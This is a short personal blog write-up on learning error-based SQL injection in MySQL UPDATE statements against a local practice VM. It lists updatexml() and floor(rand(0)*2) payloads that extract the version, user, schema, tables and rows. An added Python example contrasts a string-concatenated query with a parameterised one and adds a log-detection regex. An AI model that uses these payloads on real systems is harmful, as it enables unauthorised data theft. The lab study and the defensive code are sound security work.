Still way too much of a noob...


Background

I just wanted to quietly hunt for an XSS, and instead I ran into an UPDATE injection, something I had never come across before.

A scrub like me needs to study up.


I found a target VM on GitHub, set it up locally and used it to learn UPDATE injection.

Using updatexml()
Check the version:

'or updatexml(0,(select concat(0x7e,version())),0)='0


Check the current user:

'or updatexml(0,(select concat(0x7e,user())),0)='0

Check the database name:

'or updatexml(0,(select concat(0x7e,database())),0)='0


Using SQL subqueries (the floor(rand(0)*2) / group by duplicate-key error trick):

Database name:

'or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'--+

User:

'or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'--+


Table names:

'or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(table_name as char),0x27,0x7e)) FROM information_schema.tables where table_schema='injection' limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'--+

Column names:

'or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(column_name as char),0x27,0x7e)) FROM information_schema.columns where table_schema='injection' and table_name='student' limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'--+

Column contents:

'or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(name as char),0x27,0x7e)) FROM student limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'--+

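As an added example (not code from the post or from the test VM), here is a small Python script showing why the payloads above work and how to shut them down: a string-concatenated UPDATE next to a parameterised one, both run against an in-memory SQLite stand-in for the student table, plus a log check for the updatexml / floor(rand(0)*2) signatures used above and the extractvalue() / name_const() variants listed further down. The table, the log lines and all function names are my own constructions.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed stand-in for the test VM's 'student' table (SQLite in memory, so it runs offline).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE student (id INTEGER PRIMARY KEY, name TEXT, address TEXT)")
    conn.executemany("INSERT INTO student (name, address) VALUES (?, ?)",
                     [("alice", "1 First St"), ("bob", "2 Second St")])
    conn.commit()
    return conn

# The post's updatexml() probe, used here only as the input we want to neutralise.
UPDATEXML_PAYLOAD = "'or updatexml(0,(select concat(0x7e,version())),0)='0"

def probe_vulnerable(address, student_id=1):
    """Hypothetical string-concatenated UPDATE, modelled on the kind of code the test VM has.
    Returns ("error", message) if the database rejected the statement, else ("ok", rowcount)."""
    conn = make_db()
    sql = "UPDATE student SET address='%s' WHERE id=%d" % (address, student_id)
    try:
        cur = conn.execute(sql)   # the quote in the payload ends the literal; the rest is parsed as SQL
        conn.commit()
        return ("ok", cur.rowcount)
    except sqlite3.OperationalError as exc:
        # SQLite has no updatexml(); the point is that the payload reached the SQL parser at all.
        # On MySQL the same statement runs and the XPath error text carries the version() result.
        return ("error", str(exc))

def probe_safe(address, student_id=1):
    """Parameterised UPDATE: the driver sends the value separately from the statement text.
    Returns (rowcount, value actually stored)."""
    conn = make_db()
    cur = conn.execute("UPDATE student SET address=? WHERE id=?", (address, student_id))
    conn.commit()
    stored = conn.execute("SELECT address FROM student WHERE id=?", (student_id,)).fetchone()[0]
    return (cur.rowcount, stored)

# Signatures of the error-based techniques the post uses (updatexml, floor/rand/group by)
# plus the extractvalue() / name_const() alternatives it lists at the end.
ERROR_BASED_SIGNATURES = re.compile(
    r"updatexml\s*\(|extractvalue\s*\(|name_const\s*\(|"
    r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)",
    re.IGNORECASE,
)

# Constructed access-log lines; the injected values are URL-encoded as a browser would send them.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /update.php?id=1&address=Random+Street+2 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /update.php?id=1&address=%27or+updatexml(0,(select+concat(0x7e,version())),0)=%270 HTTP/1.1" 500 301',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /update.php?id=1&address=%27or+(SELECT+1+FROM(SELECT+count(*),concat((SELECT+database()),floor(rand(0)*2))x+FROM+information_schema.columns+group+by+x)a)+or%27--+ HTTP/1.1" 500 288',
]

def flag_requests(log_lines):
    """Return (line index, matched token) for each log line whose decoded request carries a signature."""
    hits = []
    for i, line in enumerate(log_lines):
        decoded = unquote_plus(line)   # %27 -> ', + -> space, so spaced variants still match
        m = ERROR_BASED_SIGNATURES.search(decoded)
        if m:
            hits.append((i, m.group(0)))
    return hits

if __name__ == "__main__":
    print(probe_vulnerable(UPDATEXML_PAYLOAD))
    print(probe_safe(UPDATEXML_PAYLOAD))
    for idx, token in flag_requests(SAMPLE_LOG):
        print("line %d flagged on %r" % (idx, token))
```

The parameterised version stores the whole payload as a plain address string and touches exactly one row; the concatenated version hands the payload to the parser, which is the whole bug. The log regex decodes the request first because the `'` and spaces arrive as `%27` and `+`; it is a coarse signal for the specific functions this post uses, not a substitute for fixing the query.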


Just a quick write-up; I really am a scrub.

Other functions that work for this kind of error-based injection:

  • extractvalue()
  • name_const()

Notes taken, I'm out...

References:
https://drops.secquan.org/tips/2078
https://blog.csdn.net/Fly_hps/article/details/79416842

Target VM:
https://github.com/admintony/insert_update_injectionCode



This article was written by Qinto. Unless marked as a repost or credited to another source, it is original content of this site; please credit the author before republishing.